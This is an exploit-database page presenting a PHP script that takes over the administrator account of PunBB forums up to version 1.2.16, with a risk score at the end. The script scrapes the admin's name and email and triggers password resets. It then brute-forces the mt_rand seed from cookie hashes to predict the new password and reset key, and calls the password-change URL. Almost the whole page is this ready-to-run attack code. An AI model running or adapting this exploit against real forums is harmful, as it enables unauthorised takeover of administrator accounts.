PunBB <= 1.2.16 Blind Password Recovery Exploit

🗓️ 21 Feb 2008 00:00:00Reported by RootType
PunBB <= 1.2.16 Blind Password Recovery Exploi

                                                &lt;?php
/**
&nbsp;*&nbsp;Original&nbsp;:&nbsp;http://sektioneins.de/advisories/SE-2008-01.txt
&nbsp;*&nbsp;Thanks&nbsp;to&nbsp;Stefan&nbsp;Esser,&nbsp;here's&nbsp;the&nbsp;exploit.
&nbsp;*
&nbsp;*&nbsp;Team&nbsp;:&nbsp;EpiBite
&nbsp;*&nbsp;firefox,&nbsp;petit-poney,&nbsp;thot
&nbsp;*&nbsp;Nous&nbsp;tenons&nbsp;a&nbsp;remercier&nbsp;nos&nbsp;mamans&nbsp;et&nbsp;papas&nbsp;respectifs.
&nbsp;*&nbsp;Let's&nbsp;get&nbsp;a&nbsp;fu***&nbsp;coffee&nbsp;!
&nbsp;*/

//&nbsp;conf
define('URL',&nbsp;'http://localhost/punbb_1-2-16_fr/upload');	//&nbsp;base&nbsp;url
define('EMAIL',&nbsp;'[email protected]');				//&nbsp;your&nbsp;email
define('LOGIN',&nbsp;'login_x');					//&nbsp;your&nbsp;login
define('PASS',&nbsp;'620553.8I73');					//&nbsp;your&nbsp;pass
//&nbsp;Exploit
printf(&quot;--\nUrl&nbsp;:&nbsp;%s\nEmail&nbsp;:&nbsp;%s\n--\n&quot;,&nbsp;URL,&nbsp;EMAIL);
$h&nbsp;=&nbsp;curl_init();
curl_setopt($h,&nbsp;CURLOPT_URL,
URL.'/userlist.php?username=&amp;show_group=-1&amp;sort_by=registered&amp;sort_dir=ASC&amp;search=Envoyer');
curl_setopt($h,&nbsp;CURLOPT_RETURNTRANSFER,&nbsp;1);
$s&nbsp;=&nbsp;curl_exec($h);
preg_match('/profile\.php\?id=([0-9]*)&quot;&gt;([^&lt;]*)&lt;/',&nbsp;$s,&nbsp;$m);
define('ADMIN',&nbsp;$m[2]);
preg_match('/&lt;td&nbsp;class=&quot;tcr&quot;&gt;([0-9]{4})-([0-9]{2})-([0-9]{2})&lt;\/td/',&nbsp;$s,&nbsp;$m);
if&nbsp;(count($m))
&nbsp;&nbsp;define('DATE',&nbsp;mktime(0,&nbsp;0,&nbsp;0,&nbsp;$m[2],&nbsp;$m[3],&nbsp;$m[1]));
else
&nbsp;&nbsp;define('DATE',&nbsp;time()&nbsp;-&nbsp;86400);&nbsp;//just&nbsp;in&nbsp;case,&nbsp;the&nbsp;forum&nbsp;or&nbsp;account
just&nbsp;has&nbsp;been&nbsp;created
printf(&quot;Admin&nbsp;:&nbsp;%s\nDate&nbsp;:&nbsp;%s\n--\n&quot;,&nbsp;ADMIN,&nbsp;DATE);
$h&nbsp;=&nbsp;curl_init();
curl_setopt($h,&nbsp;CURLOPT_URL,&nbsp;URL.'/login.php?action=forget_2');
//&nbsp;curl_setopt($h,&nbsp;CURLOPT_PROXY,&nbsp;'proxies.epitech.net:3128');
curl_setopt($h,&nbsp;CURLOPT_RETURNTRANSFER,&nbsp;1);
curl_setopt($h,&nbsp;CURLOPT_HEADER,&nbsp;1);
curl_setopt($h,&nbsp;CURLOPT_POST,&nbsp;1);
curl_setopt($h,&nbsp;CURLOPT_POSTFIELDS,&nbsp;implode('&amp;',&nbsp;array('form_sent=1',
						&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'req_email='.urlencode(EMAIL),
						&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'request_pass=Envoyer')));
preg_match('/mailto:([^&quot;]*)&quot;/',&nbsp;curl_exec($h),&nbsp;$m);
define('ADMIN_MAIL',&nbsp;$m[1]);&nbsp;//&nbsp;Admin&nbsp;email&nbsp;(normally&nbsp;automatically
get,&nbsp;set&nbsp;manually&nbsp;if&nbsp;there's&nbsp;problem)
printf(&quot;Admin&nbsp;mail&nbsp;:&nbsp;%s\n--\n&quot;,&nbsp;ADMIN_MAIL);
$h&nbsp;=&nbsp;curl_init();
curl_setopt($h,&nbsp;CURLOPT_URL,&nbsp;URL.'/login.php?action=forget_2');
curl_setopt($h,&nbsp;CURLOPT_RETURNTRANSFER,&nbsp;1);
//&nbsp;curl_setopt($h,&nbsp;CURLOPT_PROXY,&nbsp;'proxies.epitech.net:3128');
curl_setopt($h,&nbsp;CURLOPT_COOKIE,
'punbb_cookie='.rawurlencode(serialize(array(0&nbsp;=&gt;&nbsp;2,&nbsp;1&nbsp;=&gt;
md5('bite')))));
curl_setopt($h,&nbsp;CURLOPT_HEADER,&nbsp;1);
curl_setopt($h,&nbsp;CURLOPT_POST,&nbsp;1);
curl_setopt($h,&nbsp;CURLOPT_POSTFIELDS,&nbsp;implode('&amp;',&nbsp;array('form_sent=1',
						&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'req_email='.urlencode(ADMIN_MAIL),
						&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'request_pass=Envoyer')));
$s&nbsp;=&nbsp;curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/',&nbsp;$s,&nbsp;$m);
$c&nbsp;=&nbsp;unserialize(urldecode($m[1]));
define('MD5_NOT_LOGGUED',&nbsp;$c[1]);
printf(&quot;Md5&nbsp;not&nbsp;loggued&nbsp;:&nbsp;%s\n--\n&quot;,&nbsp;MD5_NOT_LOGGUED);
$h&nbsp;=&nbsp;curl_init();
curl_setopt($h,&nbsp;CURLOPT_URL,&nbsp;URL.'/login.php?action=in');
curl_setopt($h,&nbsp;CURLOPT_RETURNTRANSFER,&nbsp;1);
curl_setopt($h,&nbsp;CURLOPT_HEADER,&nbsp;1);
//&nbsp;curl_setopt($h,&nbsp;CURLOPT_PROXY,&nbsp;'proxies.epitech.net:3128');
curl_setopt($h,&nbsp;CURLOPT_POST,&nbsp;1);
curl_setopt($h,&nbsp;CURLOPT_POSTFIELDS,&nbsp;implode('&amp;',&nbsp;array('form_sent=1',
						&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'redirect_url=index.php',
						&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'req_username='.LOGIN,
						&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'req_password='.PASS)));
$s&nbsp;=&nbsp;curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/',&nbsp;$s,&nbsp;$m);
$c&nbsp;=&nbsp;unserialize(urldecode($m[1]));
define('MD5_LOGGUED',&nbsp;$c[1]);
printf(&quot;Md5&nbsp;loggued&nbsp;:&nbsp;%s\n--\n&quot;,&nbsp;MD5_LOGGUED);
define('PASS_MD5ED',&nbsp;sha1(PASS));
$chars&nbsp;=&nbsp;array('/',&nbsp;'-',&nbsp;&quot;\\&quot;,&nbsp;'|');
for&nbsp;($p&nbsp;=&nbsp;0;&nbsp;$p&nbsp;&lt;&nbsp;86400&nbsp;*&nbsp;2;&nbsp;$p++)
{
&nbsp;&nbsp;if&nbsp;(!($p&nbsp;%&nbsp;300))
&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;$chars[($p&nbsp;/&nbsp;300)&nbsp;%&nbsp;4].&quot;\r&quot;;
&nbsp;&nbsp;if&nbsp;(strcmp(MD5_LOGGUED,&nbsp;md5(substr(md5((int)(DATE&nbsp;+&nbsp;$p)),
-8).PASS_MD5ED))&nbsp;==&nbsp;0)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;define('SEED',&nbsp;substr(md5(DATE&nbsp;+&nbsp;$p),&nbsp;-8));
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
&nbsp;&nbsp;&nbsp;&nbsp;}
}
printf(&quot;Seed&nbsp;:&nbsp;%s\n--\n&quot;,&nbsp;SEED);
for&nbsp;($p&nbsp;=&nbsp;0;&nbsp;$p&nbsp;&lt;&nbsp;1000000;&nbsp;$p++)
{
&nbsp;&nbsp;if&nbsp;(!($p&nbsp;%&nbsp;300))
&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;$chars[($p&nbsp;/&nbsp;300)&nbsp;%&nbsp;4].&quot;\r&quot;;
&nbsp;&nbsp;mt_srand((double)$p);
&nbsp;&nbsp;if&nbsp;(strcmp(md5(SEED.random_pass(8)),&nbsp;MD5_NOT_LOGGUED)&nbsp;==&nbsp;0)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;define('SRAND',&nbsp;$p);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
&nbsp;&nbsp;&nbsp;&nbsp;}
}
printf(&quot;SRAND&nbsp;:&nbsp;%s\n--\n&quot;,&nbsp;SRAND);
mt_srand(SRAND);
random_pass(8);
printf(&quot;New&nbsp;password&nbsp;:&nbsp;%s\n--\n&quot;,&nbsp;random_pass(8));
$url&nbsp;=&nbsp;URL.'/profile.php?id=2&amp;action=change_pass&amp;key='.random_pass(8);//
Id&nbsp;is&nbsp;set&nbsp;to&nbsp;'2'&nbsp;(the&nbsp;admin's&nbsp;id,&nbsp;but&nbsp;you&nbsp;can&nbsp;change&nbsp;your&nbsp;target)
$h&nbsp;=&nbsp;curl_init();
curl_setopt($h,&nbsp;CURLOPT_URL,&nbsp;$url);
curl_setopt($h,&nbsp;CURLOPT_RETURNTRANSFER,&nbsp;1);
curl_exec($h);
function&nbsp;random_pass($len)
{
&nbsp;&nbsp;$chars&nbsp;=&nbsp;'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
&nbsp;&nbsp;$password&nbsp;=&nbsp;'';
&nbsp;&nbsp;for&nbsp;($i&nbsp;=&nbsp;0;&nbsp;$i&nbsp;&lt;&nbsp;$len;&nbsp;++$i)
&nbsp;&nbsp;&nbsp;&nbsp;$password&nbsp;.=&nbsp;substr($chars,&nbsp;(mt_rand()&nbsp;%&nbsp;strlen($chars)),&nbsp;1);
&nbsp;&nbsp;return&nbsp;$password;
}
21 Feb 2008 00:00Current
7.1High risk
Vulners AI Score7.1
PunBB &lt;= 1.2.16 Blind Password Recovery Exploit

PunBB <= 1.2.16 Blind Password Recovery Exploit
